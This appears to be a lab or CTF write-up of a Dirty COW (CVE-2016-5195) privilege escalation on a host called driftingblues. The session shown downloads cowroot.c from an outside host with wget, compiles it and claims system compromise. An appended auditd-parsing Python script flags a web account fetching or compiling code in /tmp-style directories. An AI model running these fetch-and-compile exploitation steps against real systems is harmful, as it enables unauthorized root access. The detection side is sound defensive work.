CVE-2016-5195


PEAS has identified that the driftingblues (192.168.207.219) host is vulnerable to CVE-2016-5195.

A vulnerability was found in the Linux kernel up to 4.2.3 and has been rated critical. It affects unspecified functionality in the kernel memory subsystem, where manipulation leads to a race condition (Dirty COW). The vulnerability is tracked as CVE-2016-5195. The attack can be launched from the local host, and an exploit is available. The vulnerability has had a historic impact due to its background and reception. Upgrading the affected component is recommended.

Exploit


Exploit found online

Exploitation


www-data@driftingblues:/var/tmp$ wget -q http://192.168.45.247/cowroot.c ; chmod 755 ./cowroot.c

Delivery complete

www-data@driftingblues:/var/tmp$ gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:98:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
In file included from cowroot.c:27:0:
/usr/include/unistd.h:331:16: note: expected '__off_t' but argument is of type 'void *'

Compiling

System level compromise
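
A detection-side view of the delivery and compile steps above, as an added example that is not part of the original write-up: it parses trimmed, constructed auditd-style execve records and flags a service account running a downloader or compiler from a world-writable directory. The log lines, uid 33 for www-data, and the tool and directory lists are assumptions.

```python
import re

# Constructed, trimmed auditd records (not from the original page), modelled
# on the session above. Assumption: uid 33 is www-data, as on Debian defaults.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.101:501): syscall=59 success=yes uid=33 comm="wget" exe="/usr/bin/wget"
type=EXECVE msg=audit(1700000000.101:501): argc=3 a0="wget" a1="-q" a2="http://192.168.45.247/cowroot.c"
type=CWD msg=audit(1700000000.101:501): cwd="/var/tmp"
type=SYSCALL msg=audit(1700000009.440:502): syscall=59 success=yes uid=33 comm="gcc" exe="/usr/bin/gcc"
type=EXECVE msg=audit(1700000009.440:502): argc=5 a0="gcc" a1="cowroot.c" a2="-o" a3="cowroot" a4="-pthread"
type=CWD msg=audit(1700000009.440:502): cwd="/var/tmp"
type=SYSCALL msg=audit(1700000020.002:503): syscall=59 success=yes uid=1000 comm="gcc" exe="/usr/bin/gcc"
type=EXECVE msg=audit(1700000020.002:503): argc=2 a0="gcc" a1="main.c"
type=CWD msg=audit(1700000020.002:503): cwd="/tmp"
"""

SERVICE_UIDS = {33}                             # assumption: www-data
TOOLS = {"wget", "curl", "gcc", "cc", "make"}   # downloaders and compilers
WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")     # world-writable staging dirs
HEADER = re.compile(r'type=(\w+) msg=audit\([\d.]+:(\d+)\): (.*)')
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_events(log):
    """Group records that share an audit serial number into one event dict."""
    events = {}
    for line in log.splitlines():
        m = HEADER.match(line)
        if m:
            rtype, serial, body = m.groups()
            fields = {k: v.strip('"') for k, v in FIELD.findall(body)}
            events.setdefault(int(serial), {})[rtype] = fields
    return events

def suspicious_execs(log):
    """Flag service-account runs of download/compile tools in writable dirs."""
    hits = []
    for serial, ev in sorted(parse_events(log).items()):
        sc, ex, cwd = ev.get("SYSCALL", {}), ev.get("EXECVE", {}), ev.get("CWD", {})
        if not sc.get("uid", "").isdigit() or int(sc["uid"]) not in SERVICE_UIDS:
            continue
        argv = [ex[f"a{i}"] for i in range(int(ex.get("argc", 0))) if f"a{i}" in ex]
        path = cwd.get("cwd", "")
        staged = any(path == d or path.startswith(d + "/") for d in WRITABLE)
        if sc.get("comm") in TOOLS and staged:
            hits.append((serial, sc["comm"], path, " ".join(argv)))
    return hits

if __name__ == "__main__":
    for hit in suspicious_execs(SAMPLE_LOG):
        print(hit)
```

The third record, a regular user compiling in /tmp, is not flagged: the signal is a web-server account fetching and building code, which the service has no routine reason to do.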